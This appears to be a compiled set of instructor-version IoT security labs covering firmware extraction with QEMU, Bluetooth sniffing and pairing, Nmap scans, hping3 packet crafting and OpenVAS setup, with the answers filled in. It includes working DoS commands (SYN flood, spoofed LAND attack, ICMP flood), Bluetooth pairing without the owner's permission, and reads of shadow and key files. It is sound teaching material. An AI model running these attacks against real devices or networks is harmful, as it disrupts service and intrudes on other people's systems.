Step 5: Navigate and explore this extracted file system

a. Verify the directory you are in and list the content of the directory:
# pwd
# ls -l
b. Move into the new squashfs-root directory:
# cd squashfs-root
What are some of the subdirectories in this directory? What command did you use?
____________________________________________________________________________________
____________________________________________________________________________________
sbin, ls -l
c. The readelf command can be used to determine what architecture a binary file was originally compiled to
be run on. Use readelf to determine what architecture the chkntfs binary file (located in sbin) is supposed
to be run on. This command will help us determine which qemu binary to run in the next step.
# readelf -h sbin/route
What is the Machine architecture listed?
____________________________________________________________________________________
MIPS architecture (MIPS R30ch 00)
Step 6: Use the QEMU open source machine emulator and virtualizer
QEMU will allow you to emulate binaries for other architectures different from what your Kali Linux image is
currently running on. QEMU supports the MIPS architecture.
All of the binaries in the squashfs-root directory that were decompiled/decompressed from the IoT device’s
firmware file were compiled for the MIPS architecture. They will not run on this Kali Virtual Image because it is
on a different architecture. In order to run these binaries, we will need to use QEMU.
Instructor Note: QEMU should already be installed on the Kali Linux virtual image.
a. The QEMU binary that we will be using needs to be copied to the squash-fs-root directory. Before we
copy it, we need to know where it is located:
# which qemu-mips-static
Where is this binary file located? _________________________________________________________
/usr/bin/qemu-mips-static
b. Copy this file to the current working directory which should be squash-fs-root:
# cp /usr/bin/qemu-mips-static .
c. Try running bin/busybox and other binaries without QEMU and notice that they will not be successful:
# bin/busybox
# bin/ping 127.0.0.1
These commands did not work since the QEMU emulator is required to run binaries originally compiled on
different architectures.
d. The following uses the chroot command. The chroot command changes the root directory to the current
directory as identified with the . (dot)
Enter the commands below to demonstrate that we can run MIPS binaries on the Kali Linux OS:
# chroot . ./qemu-mips-static bin/busybox date
# chroot . ./qemu-mips-static bin/ping –c 3 127.0.0.1
e. Start a new shell within the squashfs-root directory with the following command:
# chroot . ./qemu-mips-static bin/sh
How did the prompt change? ____________________________________________________________
It is now displaying the path as ‘/’ followed by the # for the root prompt
f. Verify that new shell is using the current path as the root directory.
# pwd
What is the current path? ______________________________________________________________ /
Look at other programs/binaries in the bin and sbin directories. Try running at least 3 other programs and
document their results. Type ‘exit’ when you have completed exploration to leave the shell.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
Step 7: Explore and look at other important files on this decompiled/extracted file
system
a. Verify you are currently within the squashfs-root directory:
# pwd
b. Use the following commands to explore and look for possible vulnerabilities:
# ls -l usr
# ls -l usr/bin
# ls -l bin/
# ls -l usr/sbin
# ls –l etc/
# cat etc/passwd
# cat etc/shadow
# cat etc/ssh/ssh_host_rsa_key
c. What other commands did you use to explore and look for possible vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. Example: The mount command could allow access to other filesystems and import
malicious files or export files, such as /etc/shadow.
Part 2: Reflection and Discussion of Threats to IoT Device Firmware

Part 1 of this lab demonstrates how to decompile/disassemble a binary firmware file and navigate the file
system for vulnerabilities. Hackers are able to use widely available tools to modify the firmware with
backdoors or Trojan horses and repackage the firmware into a new firmware image.
Reflection
1. What kinds of threats or vulnerabilities are IoT device firmware susceptible to?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices might be vulnerable to attacks such as Buffer Overflow attacks, DoS attacks, firmware
modification, distributed denial of service, and key handling vulnerabilities.
2. Describe one type of IoT device firmware attack and what measures could be used to help prevent this type
of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
A backdoor could be added to an existing script within the device firmware. If a hacker repackages the
firmware into a new downloadable binary file, an unsuspecting user could potentially install this infected
firmware on their IoT device. A hash could be used to verify that firmware binary files have not be modified.
3. Describe another type of IoT device firmware attack and what measures could be used to help prevent this
type of attack.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
IoT devices with default usernames could be logged into remotely. Fix includes: changing the default
username/passwords.
In addition: Passwords can be cracked or modified, and certificates can be modified.
4. What is the name of the program that hackers could use to modify firmware with a backdoor and repackage it
back into another firmware binary? Does this program exist on the Kali Linux operating system that you are
using? Hint: Use Google to find the answer.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
firmware-mod-kit
Yes.
Lab - Sniffing Bluetooth with the Raspberry Pi (Instructor Version)
Topology
Objectives
In this lab, students will become familiar with varying levels of security on different common devices that use
Bluetooth/BLE (Bluetooth Low Energy). Students will configure a Raspberry Pi to detect and display
information about the Bluetooth devices that are in its range. This is an awareness building lab that will help
students understand the nature of wireless hacking processes and requirements and take on a “hacker
mindset” to think like a “white hat” to help secure IoT Security devices.
Part 1: Configuring the Raspberry Pi as a Bluetooth Sniffer
Part 2: Using the CLI to Detect and Display Information about Bluetooth Device
Part 3: Using the CLI to Pair with a Sniffed Device
Background/Scenario
Bluetooth offers several benefits and advantages. Bluetooth also has risks.
Bluetooth technology and associated devices are susceptible to general wireless networking threats, such as
denial of service attacks and man in the middle (MITM) attacks. MITM attacks occur when the threat actors
position themselves between the source and destination and intercept the communications. Some Bluetooth
devices are designed to broadcast MAC, universal unique identifier (UUID) and service information at a
predefined interval. Due to continuous advertisement, hackers can easily track the device and decode the
broadcasting information using a sniffer. This lab requires that the target Bluetooth devices are locatable by
the Raspberry Pi. These could be phones, laptops, personal fitness devices, and others.
Note: The labs in this course assume that the student has all of the necessary hardware to perform them. If
you do not have the necessary hardware and wish to complete these labs, you may wish to purchase kits
which contain all of the hardware for the challenge labs and additional hardware, which can be used to
complete additional experiments beyond this course. Make sure to read the required resources for each
challenge lab to understand what hardware is required.
Instructor Note: Using a sniffer may be considered a breach of the security policy of the school. It is
recommended that permission be obtained before running this lab. If using a sniffer is an issue, the instructor
may wish to assign the lab as homework.
Lab - Sniffing Bluetooth with the Raspberry Pi
Required Resources
• Raspberry Pi 3 Model B or later (with PL-App)
• 8GB Micro SD card (minimum required)
• PC with IoTSec Kali VM
• Network connectivity between PC and Raspberry Pi
• Bluetooth devices (PC, Smartphone, Smartband, Bluetooth LED Control…)
Part 1: Configuring the Raspberry Pi as a Bluetooth Sniffer

a. Start the IoT Security lab topology with Kali VM and Raspberry Pi connected physically via an Ethernet
cable.
b. Log into Kali VM with the username root and password toor.
c. Open a terminal window and start the DHCP server.
d. Determine the IP address of your Raspberry Pi as was done in previous labs, if necessary.
e. Open a web browser in the Kali VM or your host PC and navigate to the IP address for your Raspberry Pi.
Step 2: Verify and activate the Bluetooth interface/services on the Raspberry Pi.
a. Within the PL-App, open a terminal window and enter the rfkill list command to check if the Bluetooth
interface is blocked by software:
(pl-app) root@pi:/home/pi/notebooks# rfkill list
0: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
1: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
b. If the Bluetooth Interface hci0 is blocked, use the command rfkill unblock bluetooth to unlock it.
c. Use the systemctl status bluetooth.service command to show the status of the Bluetooth service.
(pl-app) root@pi:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: active (running) since Tue 2018-05-22 00:00:02 UTC; 10h ago
Docs: man:bluetoothd(8)
Main PID: 522 (bluetoothd)
Status: "Running"
CGroup: /system.slice/bluetooth.service
└─522 /usr/lib/bluetooth/bluetoothd
<output omitted>
d. If the Bluetooth service status is not “active (running)”, use the command systemctl start
bluetooth.service to start it.
(pl-app) root@pi:/home/pi/notebooks# systemctl start bluetooth.service
e. Use the hciconfig hci0 command to display the status of the Bluetooth interface.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0
hci0: Type: Primary Bus: UART
BD Address: B8:27:EB:72:CC:11 ACL MTU: 1021:8 SCO MTU: 64:1
UP RUNNING
RX bytes:6770 acl:46 sco:0 events:230 errors:0
TX bytes:3819 acl:46 sco:0 commands:90 errors:0
f. If the hci0 interface status is down, use the command hciconfig hci0 up to activate it.
(pl-app) root@pi:/home/pi/notebooks# hciconfig hci0 up
Part 2: Using the CLI to Detect and Display Information about Bluetooth
Devices
a. From the command line, use the command bluetoothctl to launch the Bluetooth tool. The prompt will
change to [bluetooth] and will be displayed. It will display some information about the Bluetooth
controller of your Raspberry Pi and probably some information about Bluetooth devices connected or
available for pairing:
(pl-app) root@pi:/home/pi/notebooks# bluetoothctl
[NEW] Controller B8:27:EB:72:CC:11 raspberrypi [default]
[bluetooth]#
b. Enter the scan on command to start searching for nearby Bluetooth devices and scan off to stop it. You
should see the MAC addresses and sometimes the device name of all Bluetooth devices discovered by
the Raspberry Pi:
[bluetooth]# scan on
Discovery started
[CHG] Controller B8:27:EB:72:CC:11 Discovering: yes
[NEW] Device A4:C1:38:CC:F5:42 Triones-A4C138CCF542
[NEW] Device DA:B6:4A:F2:A8:BA Band
[NEW] Device 28:98:7B:E1:CE:D8 GT-S700
[bluetooth]# scan off
Take note of the MAC address (and if available the name) of some discovered Bluetooth devices:
____________________________________________________________________________________
Answers will vary.
c. Use the info command followed by the MAC address of a discovered device to obtain detailed
information about the device:
[bluetooth]# info DA:B6:4A:F2:A8:BA
Device DA:B6:4A:F2:A8:BA
Name: Band
Alias: Band
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Anhui Huami Information.. (0000fee0-0000-1000-8000-00805f9b34fb)
ManufacturerData Key: 0x0157
Take note of the information displayed and perform a web search for the meaning of some fields
displayed and report below a summary of the main information displayed.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The output for DA:B6:4A:F2:A8:BA is a smartband. The UUID usually represents some common service
(protocol) that the discovered Bluetooth device supports.
Additional Example 1: This output is related to a GT-S7500 Smartphone.
[bluetooth]# info 28:98:7B:E1:CE:D8
Device 28:98:7B:E1:CE:D8
Name: GT-S7500
Alias: GT-S7500
Class: 0x58020c
Icon: phone
Paired: no
Trusted: no
Blocked: no
Connected: no
LegacyPairing: no
UUID: Audio Source (0000110a-0000-1000-8000-00805f9b32fb)
UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b32fb)
UUID: Handsfree Audio Gateway (0000111f-0000-1000-8000-00805f9b32fb)
UUID: Headset AG (00001112-0000-1000-8000-00805f9b32fb)
UUID: OBEX Object Push (00001105-0000-1000-8000-00805f9b32fb)
UUID: Phonebook Access Server (0000112f-0000-1000-8000-00805f9b32fb)
[bluetooth]#
Additional Example 2: This output is related to a LED Bluetooth controller.
[bluetooth]# info A4:C1:38:CC:F5:42
Device A4:C1:38:CC:F5:42
Name: Triones-A4C138CCF542
Alias: Triones-A4C138CCF542
Paired: no
Trusted: no
Blocked: no
Connected: no
Legacy Pairing: no
UUID: Unknown (0000ffd0-0000-1000-8000-00805f9b34fb)
UUID: Unknown (0000ffd5-0000-1000-8000-00805f9b34fb)
[bluetooth]#
Part 3: Using the CLI to Pair with a Sniffed Device

a. Use the command paired-devices to view the devices actually paired with the Raspberry Pi.
[bluetooth]# paired-devices
Report below the MAC address and name of the Bluetooth devices actually paired with your Raspberry
Pi.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. Using the command pair followed by the MAC address, for example, pair CA:4C:FB:5E:00:BA, try to
pair via Bluetooth the Raspberry Pi to some previously discovered devices.
[bluetooth]# pair CA:4C:FB:5E:00:BA
Attempting to pair with CA:4C:FB:5E:00:BA
<Output omitted>
[CHG] Device CA:4C:FB:5E:00:BA Paired: yes
Pairing successful
Are you able to pair without permission from the owner to some Bluetooth devices? Please, report below
your findings:
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
You probably will not be able to pair without the authorization of the owner to Bluetooth devices
implementing high levels of security.
c. Use the command paired-devices to view the devices now paired with the Raspberry Pi.
[bluetooth]# paired-devices
Device CA:4C:FB:5E:00:BA K800BA
Record the MAC address and name of the Bluetooth devices actually paired with your Raspberry Pi.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
d. Using the command connect followed by the MAC address, for example, connect CA:4C:FB:5E:00:BA,
try to connect via Bluetooth the Raspberry Pi to some previously paired devices.
[bluetooth]# connect CA:4C:FB:5E:00:BA
Attempting to connect to CA:4C:FB:5E:00:BA
[CHG] Device CA:4C:FB:5E:00:BA Connected: yes
Connection successful
[CHG] Device CA:4C:FB:5E:00:BA ServicesResolved: yes
[K800BA]#
Are you able to connect (without permission from the owner) to some Bluetooth devices? Write your
findings below:
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. You may not be able to connect, without the authorization of the owner, with Bluetooth
Devices implementing high level of security. The Raspberry Pi can be connected to a Bluetooth device
without PIN. Probably further operations may be accomplished after pairing the device. Please note that
the success/output of the command depends on the Bluetooth version and Bluetooth Security level mode
of the target device. For example, Bluetooth devices that use Security Mode 1 are inherently insecure.
e. Enter quit to exit the Bluetooth tool.
[bluetooth]# quit
Part 4: Clean Up
a. Enter systemctl stop bluetooth.service to disable the Bluetooth service.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl stop bluetooth.service
b. Verify that the Bluetooth service has been disabled with the systemctl status bluetooth.service
command.
(pl-app) root@Pi-3:/home/pi/notebooks# systemctl status bluetooth.service
● bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; enabled; vendor
preset: enabled)
Active: inactive (dead) since Tue 2018-11-27 21:47:30 UTC; 1min 10s ago
Docs: man:bluetoothd(8)
Process: 843 ExecStart=/usr/lib/bluetooth/bluetoothd (code=exited,
status=0/SUCCESS)
Main PID: 843 (code=exited, status=0/SUCCESS)
Status: "Quitting"
<output omitted>
Lab - Port Scanning an IoT Device (Instructor Version)
Topology
Objectives
Part 1: Perform a Nmap network discovery scan
Part 2: Compare a Nmap TCP default port scan and full scan
Part 3: Perform a Nmap UDP Scan
Part 4: Perform Nmap OS and Service Foot Printing
Nmap, or “Network mapper,” is a free and open source network port scanner. It can be used to test IoT
devices and firewalls for open, closed, or filtered ports and additionally can provide an inventory of devices
and services available on a network. Nmap uses the TCP header flag fields URG, ACK, PSH, RST, SYN,
FIN, shown in the diagram, to accomplish its scans. It also uses other protocols such as UDP, ICMP and a
built-in database of known OS and application signatures. Nmap is included with Kali, but can also be
Lab - Port Scanning an IoT Device
downloaded from https://nmap.org/. A comprehensive reference about how Nmap works and how it is used is
available at the Nmap website.
Required Resources
• Raspberry Pi 3 Model B or later
Part 1: Perform a Nmap Network Discovery Scan
Step 1: Use Kali to perform a host discovery scan.

The first step in network scanning is to discover the addresses of the hosts that are actually up on the
network. This is because many network information gathering tasks, such as port scanning, are time-
consuming. Nmap first scans the network to identify the addresses of hosts that should be scanned in greater
depth. Doing in-depth scans of an entire network of 254 hosts, for example, is unnecessary if only a fraction
of those hosts are actually on and able to respond.
By default, Nmap conducts a scan of the network to generate a list of hosts that are available for further
scanning. It then conducts a port scan of those hosts.
a. Set up the topology by connecting the Raspberry Pi to the PC.
b. Start the IoTSec Kali VM and log in.
c. Open a terminal and start the DHCP server on the Kali VM.
root@kali:~# lab_support_files/scripts/start_dhcp.sh
d. Verify that Kali VM is assigned an IP address on eth0.
e. Open the man page for nmap in Kali VM and review the options that are available in Nmap.
root@kali:~# man nmap
Refer to the man page and complete the table below. There are many other resources available online to
help you learn Nmap.
Option Name Notes
Scans every address in the network or range of addresses.

Uses reverse-DNS to attempt to discover the names of each
-sL list scan host.
Nmap will do host discovery scan, but will not do the normal
-sn no port scan port scan.
Nmap does no host discovery at all. It conducts the normal port

-Pn no ping scan on all hosts in the network or range.
Nmap skips the reverse DNS part of the host discovery

process. This can speed up scanning drastically, and is useful
when scanning LANs which usually don't have DNS names
-n no DNS resolution provided to hosts.
f. Perform a scan on your network by specifying the network address and bit mask.
root@kali:~# nmap 203.0.113.0/24
What is the IP address of the Raspberry Pi?
____________________________________________________________________________________
Answers will vary. The assigned IP address will be in the network of 203.0.113.0/24.
g. Sometimes a device would not reply to Nmap’s initial network discovery scan because of a firewall,
IDS/IPS system etc. Instead of relying on the initial scan to discover hosts that are alive for further
scanning, we can use Nmap to scan the network by assuming all hosts are alive.
root@kali:~# nmap -Pn 203.0.113.0/24
What is the IP address and MAC address of your Raspberry PI?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
Part 2: Compare a Nmap TCP Default Scan and Full Scan
Step 1: Using Wireshark to display Nmap scans

a. In a Kali VM terminal, start Wireshark. Wireshark is used to monitor the traffic while scanning the network
using Nmap. Click OK for the warning message regarding running Wireshark as a root user.
root@kali:~# wireshark
b. Select the eth0 interface and click Capture to start capturing packets.
c. There can be a lot of traffic on the network. A display filter is applied to limit the number of captured
packets displayed to just those that you are interested in. The interesting traffic is between the IP address
of the Kali VM and the Raspberry Pi. Replace IP address of the Raspberry Pi with the IP address
Apply the following display filter in Wireshark using IP address of Kali VM as the source address and IP
address of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13

As an example in this lab, the IP address for the Raspberry Pi is 203.0.113.13.
Step 2: Nmap TCP default scan

a. In the terminal, enter the following command to start the Nmap scanning.
root@kali:~# nmap 203.0.113.13
After Nmap reports the result of the scan, stop the Wireshark capture. Click the arrow next to the display
filter field to filter the results of the scan.
Review the Wireshark output. Which TCP flag is Nmap using to discover the open ports?
____________________________________________________________________________________
SYN
Notice the ports that are being tested. The default Nmap scan does not test all ports. How many ports
does a default Nmap scan test? (Do a web search if necessary.)
____________________________________________________________________________________
Only 1,000 of the most common ports.
Look at the results of the nmap scan in the terminal. What ports are identified?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. Ports 22 and 80 should be open, but others may also be found.
Step 3: Nmap TCP full TCP port scan

a. Nmap by default only scan a limited number of TCP ports. We would like to scan all 65535 TCP ports.
b. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture. to
start a new capture.
c. Enter the nmap command to scan all the TCP ports in Kali VM.
root@kali:~# nmap -p 1-65535 203.0.113.13
d. Watch the Wireshark capture screen. Notice you are sending TCP packets just as before, but the number
of ports being scanned has increased.
e. Stop the Wireshark capture when finished and clear the filter.
Part 3: Perform a Nmap UDP scan
UDP Header Format

Source Port Destination Port
Length Checksum
Step 1: UDP scan with a new Wireshark filter.

a. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
b. Apply the following filter in Wireshark:
ip.src == 203.0.113.13 && udp
This will allow us to see the UDP traffic generated by nmap to the Raspberry PI. Notice in the UDP
header above there are no flags. We can only send UDP packets and receive a possible “port
unreachable or destination unreachable” message meaning the port is closed.
c. In the Kali VM terminal, enter the command nmap with -sU option scanning the IP address of your
Raspberry Pi.
root@kail:~# nmap -sU -F 203.0.113.13
d. It will take a few minutes, but look at the Wireshark capture. As you scroll down the packets, you will see
some “Destination unreachable” on different ports indicating the port is closed.
How many UDP ports are there? How many UDP ports does Nmap scan, by default? (Use web search as
necessary.)
____________________________________________________________________________________
There are 65,535 UDP ports. Nmap scans only the most commonly used 1,000.
What are the UDP ports that are open from the scan? What protocols use these UDP ports?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. Ports 68 and 5353 are most likely. The bootp and Multicast DNS use these ports.
These services are used by PL-App.
What is the meaning of the -F option? Try the same scan without the -F. What is the difference?
____________________________________________________________________________________
____________________________________________________________________________________
The -F option stands for fast. Only the most common 100 ports are scanned. This makes the scan much
faster.
e. Stop the Wireshark capture when finished and clear the filter.
Part 4: Perform Nmap OS and Service Foot Printing
Step 1: Use Nmap to find a device operating system.

Nmap can guess the operating system of a device based on its response to a series of TCP and UDP
packets.
b. Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
c. In the Kali VM terminal, enter the command nmap using the -O option scanning the IP address of your
Raspberry Pi.
root@kali:~# nmap -O 203.0.113.13
What operating system did Nmap guess?
____________________________________________________________________________________
____________________________________________________________________________________
Linux 3.2-4.8
Look at the packets in Wireshark. What protocols were used to determine the OS?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. TCP, UDP, & ICMP
d. We can sometimes identify a device by looking at the time to live (TTL) field of a local ping response,
which varies by device OS. See the table below:
Operating System TTL Response time
Cisco 255
Windows 128
Linux 64
In the Kali VM terminal, enter the command to ping your Raspberry Pi with 4 ICMP packets.
root@kali:~# ping -c4 203.0.113.13
What is the response time? Is it consistent with the Nmap identification?
____________________________________________________________________________________
____________________________________________________________________________________
The response time is 64 which is consistent with a Linux OS response.
e. Stop the Wireshark capture when finished.
Step 2: Use Nmap to find services versions

Nmap has a built-in database of about 2,200 well-known services that is used to help identify application
service versions.
Apply the same display filter as the previous step.
b. In the Kali VM, enter the nmap command with the -A option scanning the IP address of your Raspberry
Pi.
root@kali:~# nmap -A 203.0.113.13
What are the identified applications running on the ports? Complete the table.
Port Number Application service identified
22 SSH-2.0-OpenSSH_7.4p1
80 Tornado httpd 4.5.1
88 nginx 1.10.3
89 Node.js Express framework
Answers may vary, but ports 22 and 80 should at least be open.
What is different in the port identification from the Nmap TCP scan in Part 2 of the lab and this application
service scan? What implications does this have for IoT security?
____________________________________________________________________________________
____________________________________________________________________________________
In the normal TCP scan, only protocols are identified. In this scan, details about the running services are
also shown. These details can be used to identify versions of software services that have well-known
vulnerabilities.
What additional functions does this scan also perform?
____________________________________________________________________________________
____________________________________________________________________________________
Nmap also performs a traceroute, OS detection, and SSH details.
c. Stop the Wireshark capture when finished.
Lab - Packet Crafting to Exploit Unsecured Ports (Instructor
Version)
Topology
Objectives
Part 1: Using hping3 for Port Scanning
Part 2: Crafting Different Types of ICMP Messages
Part 3: Launching DoS Attacks
hping3 is a tool used to send custom-crafted TCP/IP packets to a network target in order to elicit a response.
Many values in IP packets and TCP headers can be specified in hping3 and the resulting packets sent out on
the network. Like Nmap, hping3 can use the TCP header flag fields URG, ACK, PSH, RST, SYN, and FIN to
accomplish its scans. It can also craft packets with other protocols such as UDP and ICMP. Unlike Nmap,
however, hping3 can use its ability to craft packets to attack a target. hping3 is included in Kali or can be
Lab - Packet Crafting to Exploit Unsecure Ports
downloaded from http://www.hping.org/. Because hping3 can be used for malicious purposes, avoid using it
on production networks unless you have permission to do so.
Required Resources
• Raspberry Pi 3 Model B or later
Part 1: Using hping3 for Port Scanning

a. Set up the topology by connecting the Raspberry Pi to the PC.
b. Start and log into IoTSec Kali VM.
c. Open a terminal and start the DHCP server on Kali VM.
d. Verify that the Kali VM is assigned an IP address on eth0.
e. Determine the IP address of your Raspberry Pi.
f. Open the man page for hping3 in Kali VM and review the features and options that are available in
hping3.
root@kali:~# man hping3
g. In a Kali VM terminal, start Wireshark to monitor what hping3 is doing when we are scanning.
root@kali:~# wireshark
h. In Wireshark, select the eth0 interface in packet capture.
i. You may have captured network traffic that is not relevant to this lab. We are going to restrict the type and
of packets we see by using a display filter.
Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address. In this example, 203.0.113.1 is IP address for Kali VM
and 203.0.113.13 is the IP address of your Raspberry Pi.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
j. We will first craft packets to do a port scan against the IP address of your Raspberry Pi.
root@kali:~# hping3 -8 0-100 -S 203.0.113.13
Refer to the Wireshark capture, the man pages, and other sources on the Internet. What do the options 8,
0-100 and -S do?
____________________________________________________________________________________
____________________________________________________________________________________
-8 signifies scan mode, 0-100 is the port range to be scanned and -S is sets the SYN flag in the scan.
What ports are shown as open?
____________________________________________________________________________________
Answers may vary. Ports 22 and 80 will be open at minimum.
k. Expand your scan to include ports up to 1000.
root@kali:~# hping3 -8 0-1000 -S 203.0.113.13
Did you find any additional ports?
____________________________________________________________________________________
No
What TCP flag was set in the shown in Wireshark?
____________________________________________________________________________________
SYN
Part 2: Crafting Different Types of ICMP Messages

ICMP has different message types that we can use to probe a target. For example, message types 8 - echo
request and 0 - echo reply are used with the TCP/IP tool “ping.” However, if a target is configured not to
respond to these ICMP message types, we can use other ICMP message types to attempt to get a response.
a. Open the man page for ICMP in Kali VM and review the features and options that are available in ICMP.
root@kali:~# man icmp
What is the RFC for ICMP?
____________________________________________________________________________________
RFC 792
b. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the same display filter as in the previous part.
c. In the terminal, enter the hping3 command followed by -1 to scan in ICMP mode. Add the scan target IP
address, and enter -C followed by 13 to indicate that ICMP type 13 timestamp request messages should
be sent.
root@kali:~# hping3 -1 203.0.113.13 -C 13
d. Review the Wireshark results and confirm that the ICMP timestamp request packets were sent out. To
stop the requests, press Ctrl-C in the Kali VM terminal.
e. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
f. Apply the following filter in Wireshark using IP address of Kali VM as the source address and IP address
of your Raspberry Pi as the destination address.
ip.src == 203.0.113.1 && ip.dst == 203.0.113.13
g. Repeat the hping3 command above, but this time send ICMP code 17.
h. Review the Wireshark results. Which ICMP message was sent?
____________________________________________________________________________________
Address Mask Request
Part 3: Launching DoS Attacks

Hping3 can launch DoS attacks against ports you found previously in this lab. Using hping3 for this purpose is
a good way to test how a network will react to various types of DoS attacks.
a. Start a new Wireshark capture. Click Continue without Saving when you are prompted to save the
capture. To see two-way TCP traffic from between the Kali VM or the Raspberry Pi, enter only tcp as a
display filter.
b. In the Kali VM terminal, enter the hping3 command to send a DoS attack.
root@kali:~# hping3 -S 203.0.113.13 -p 88 --flood
Looking at Wireshark and the hping3 documentation, what type of TCP messages were sent in this DoS
attack? What was the destination TCP port of the attack?
____________________________________________________________________________________
____________________________________________________________________________________
DoS SYN flood against port 88
Look at the source ports that hping3 uses to conduct the DoS flood. How does this scan assign source
TCP ports?
____________________________________________________________________________________
____________________________________________________________________________________
It starts at a random port and increments the source port number in each packet.
c. Press Ctrl-C to stop the flood.
d. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Display only traffic that has source or destination IP addresses that match the IP address of the
Raspberry Pi. (Hint: Edit the ip.src and ip.dest display filter to both use the IP address of the Raspberry
Pi. Instead of the && operator, use the || (or) operator.
e. In the Kali VM terminal, enter the hping3 command to send a DoS Land Attack. This attack sends a
packet with the same source IP/port combination as the destination IP/port. In other words, the source IP
address is "spoofed" by replacing the Kali VM address another value in the packets.
root@kali:~# hping3 -S 203.0.113.13 -a 203.0.113.13 -k -s 89 -p 89 --flood
Compare this scan with the SYN flood that you just ran. How were source ports used in this scan? What
info does Wireshark report about the packets?
____________________________________________________________________________________
The source port is specified for the scan and it does not increment. Wirehark reports that TCP port
numbers are reused
f. Press Ctrl-C to stop the flood.
g. Start a new Wireshark capture. Click Continue without Saving when prompted to save the capture.
Apply the display filter that specifies the Kali VM as the source and the Raspberry Pi as the destination,
as was done previously in this lab.
h. In the Kali VM terminal, enter the hping3 command to send a flood attack.
root@kali:~# hping3 --flood –-icmp -p 22 203.0.113.13
Look at Wireshark what type of ICMP messages are you seeing?
____________________________________________________________________________________
Type 8 echo request
i. Press Ctrl-C to stop the flood.
j. Complete the following table for the hping3 options that you used in this lab. Use the hping3 man page or
other information resources.
Option Name Description
scans a range of TCP ports on the target host address provided

-8 scan mode
sets the SYN flag in the TCP header of the packets to be sent
-S set SYN flag
sends ICMP echo request packet(s) unless another type of packet
-1 ICMP mode has been specified
used to set the ICMP packet type
-C icmptype
send packets as fast as possible without waiting for replies
--flood N/A
set a fake IP source address
-a spoof hostname
specify destination TCP port
-p destport
specify TCP source port, or port at which to start a scan in which
-s baseport the port number is increased for each packet sent
retains the specified source port instead of incrementing it with
-k keep each packet that is sent.
Lab – Use OpenVAS for Vulnerability Assessment (Instructor
Version)
Addressing Table
Device IP Address Subnet Mask
Kali 203.0.113.1 255.255.255.0

Metasploitable 203.0.113.5 255.255.255.0
Objectives
Part 1: Exploring OpenVAS
Part 2: Configuring a Vulnerability Scan
Part 3: Reviewing the Results
As we know, IoT devices, especially those designed for the home, frequently include WWW applications that
are accessed from the Internet. These applications are a significant part of the IoT system attack surface. A
vulnerable WWW application could allow hackers to take over a home automation application and cause
damage to property, for example.
Open Vulnerability Assessment System (OpenVAS) is a framework that provides services and tools for web
application vulnerability scanning and management. Network Vulnerability Tests (NVT) are used by OpenVAS
to check for existing security issues. NVTs are developed based on Common Vulnerabilities and Exposures
(CVE).
CVE is a collection of publicly known security vulnerabilities that is available on the Internet. The
vulnerabilities are divided into two categories: vulnerabilities and exposures. The entries provide an
identification number, a description, and public references regarding the cybersecurity vulnerabilities. The
goal of the CVE is to enable the sharing of data across different vulnerability tools, repositories, and services.
CVE entries are used by the Common Vulnerability Scoring System (CVSS) as examples.
The CVSS provides an open and standardized way for scoring vulnerabilities. The scoring system allows an
organization to prioritize which vulnerabilities to fix and assess the impact of the vulnerabilities on their
systems. CVE and CVSS can be used together, however they are different systems.
In this lab, you will use OpenVAS to perform a vulnerability scan on the intentionally vulnerable Metasploitable
VM web application and review the vulnerability assessment report from the scan.
Required Resources
• Host computer with at least 4 GB of RAM and 15 GB of free disk space
• Oracle VirtualBox
• IoT Security Kali and Metasploitable VMs
Lab – Use OpenVAS for Vulnerability Assessment
Part 1: Exploring OpenVAS

a. Start the Metasploitable and Kali VMs.
b. Log into the Metasploitable VM.
username: msfadmin
password: msfadmin
c. Enter the command ifconfig at the prompt to determine the IP address of Metasploitable VM.
What is the IP address? ___________________________________________________ 203.0.113.5
d. Log into IoTSec Kali VM.
e. Open a terminal in the IoTSec Kali VM and ping the Metasploitable VM to verify connectivity. If the ping is
not successful, verify that both the Metasploitable and Kali VMs are using the same VM network.
f. In a terminal, enter the command openvas-start to start OpenVAS service.
root@kali:~# openvas-start
[*] Please wait for the OpenVAS services to start.
[*]
